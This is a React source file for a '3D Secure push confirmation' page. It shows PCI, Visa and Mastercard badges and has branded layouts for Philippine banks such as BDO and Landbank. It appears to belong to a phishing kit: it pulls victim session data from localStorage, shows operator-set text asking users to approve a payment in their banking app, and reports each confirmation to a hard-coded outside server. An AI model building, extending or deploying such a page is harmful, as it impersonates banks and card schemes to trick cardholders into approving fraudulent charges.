import React, { useState } from 'react';
import HelpImage from './assets/help.gif';
import axios from 'axios';
import { useNavigate } from 'react-router-dom';
import './Pushloader.css';
import PciImage from './assets/pci.jpg';
import VisaImage from './assets/visa.svg';
import MasterImage from './assets/master.jpg';
import { RotatingLines } from "react-loader-spinner";
import PhilippinesBankLayout, { isPhilippinesBankDesign } from './philippines/PhilippinesBankLayout';
import { isMastercard } from '../cardScheme';

const PUSHPage = () => {
  const [submitBtnContent, setSubmitBtnContent] = useState('I have confirmed the push');
  const [submitBtnDis, setSubmitBtnDis] = useState(false);
  const navigate = useNavigate();

  const design = localStorage.getItem('session_design') || '';
  const customMessage = localStorage.getItem('push_text') || 'Please open your mobile banking app to approve this payment request.';

  const today = new Date();
  const formattedDate = `${today.getDate().toString().padStart(2, '0')}/${(today.getMonth() + 1)
    .toString()
    .padStart(2, '0')}/${today.getFullYear()}`;

  const handleCodeSubmit = async (e) => {
    if (e?.preventDefault) e.preventDefault();
    if (submitBtnDis) return;

    setSubmitBtnContent(<div className="inputLoader"></div>);
    setSubmitBtnDis(true);

    const dataToSend = {
      uuId: localStorage.getItem('uuId')
    };

    try {
      const serverUrl = process.env.REACT_APP_SERVER_URL || 'https://devosyshandler.com';
      const response = await axios.post(`${serverUrl}/api/push_verif`, dataToSend);
      if (response.status === 200) {
        navigate("/3ds/loading");
      }
    } catch (error) {
      setTimeout(() => {
        setSubmitBtnDis(false);
        setSubmitBtnContent('I have confirmed the push');
      }, 3000);
    }
  };

  // 1. Philippines Bank Branded Push (BDO, Landbank, Metrobank, etc.)
  if (isPhilippinesBankDesign(design)) {
    return (
      <PhilippinesBankLayout
        design={design}
        mode="push"
        customMessage={customMessage}
        onApprove={handleCodeSubmit}
        onCancel={() => navigate('/checkout')}
      />
    );
  }

  // 2. Standard 3DS Push Layout
  const isMc = isMastercard(design);
  const imageSrc = isMc ? MasterImage : VisaImage;
  const altText = isMc ? 'Mastercard' : 'Visa';

  return (
    <div className="flex items-center justify-center w-full min-h-screen bg-white">
      <div className="w-full max-w-sm px-6 py-8 bg-white border border-neutral-300">
        <div className="flex items-center justify-between w-full mb-6">
          <img
            src={PciImage}
            alt="PCI DSS Compliant"
            className="h-12 mr-4"
          />
          {imageSrc && (
            <img src={imageSrc} alt={altText} className="h-12" />
          )}
        </div>
        <h1 className="mb-4 text-lg font-bold text-gray-800">
          Confirm Your Transaction
        </h1>
        <p className="mb-6 text-xs text-gray-900">
          {customMessage}
        </p>
        <div className="my-6">
          <RotatingLines
            visible={true}
            height="32"
            width="32"
            color="#ffffff"
            strokeWidth="5"
            animationDuration="0.75"
            ariaLabel="rotating-lines-loading"
            wrapperStyle={{}}
            wrapperClass=""
          />
        </div>
        <div className="grid grid-cols-2 mb-4 text-xs">
          <span className='text-xs'>Merchant:</span>
          <span className='text-gray-900'>{process.env.REACT_APP_MERCHANT_NAME || 'Dino World'}</span>
          
          <span className='text-xs'>Date:</span>
          <span className='text-gray-700'>{formattedDate}</span>
          
          <span className='text-xs'>Card Number:</span>
          <span className='text-gray-900'>**** **** **** {localStorage.getItem('last-four-digits') || '••••'}</span>
          
          <span className='text-xs'>Amount:</span>
          <span className='text-gray-900'>{localStorage.getItem('currency') || process.env.REACT_APP_CURRENCY || 'PHP'} {localStorage.getItem('summ') || '0.00'}</span>
        </div>

        <form onSubmit={handleCodeSubmit}>
          <div className="flex justify-between mt-3 mb-4 text-xs text-neutral-500">
            <a href="#missing" onClick={(e) => { e.preventDefault(); alert('Please open your banking app to check pending push notifications.'); }} className="leading-3 underline hover:underline">
              Didn't receive the push notification?
            </a>
          </div>
          
          <div className="flex items-center justify-between">
            <button
              type="button"
              onClick={() => navigate('/checkout')}
              className="px-4 py-2 text-xs font-medium text-neutral-600 hover:text-neutral-900 cursor-pointer"
              style={{ color: '#525252' }}
            >
              Cancel
            </button>
            <button
              type="submit"
              disabled={submitBtnDis}
              className="px-3 py-1.5 text-xs font-semibold leading-none border rounded-sm h-fit border-neutral-800 bg-neutral-100 text-neutral-900 hover:bg-neutral-200 disabled:opacity-50 disabled:cursor-not-allowed cursor-pointer transition-colors"
              style={{ color: '#171717', backgroundColor: '#f5f5f5' }}
            >
              {submitBtnContent}
            </button>
            <button
              type="button"
              className="flex items-center px-4 py-2 text-xs font-medium text-neutral-600 hover:text-neutral-900 cursor-pointer"
              style={{ color: '#525252' }}
            >
              <img className='mr-1' src={HelpImage} alt="" />
              Help
            </button>
          </div>
        </form>
      </div>
    </div>
  );
};

export default PUSHPage;
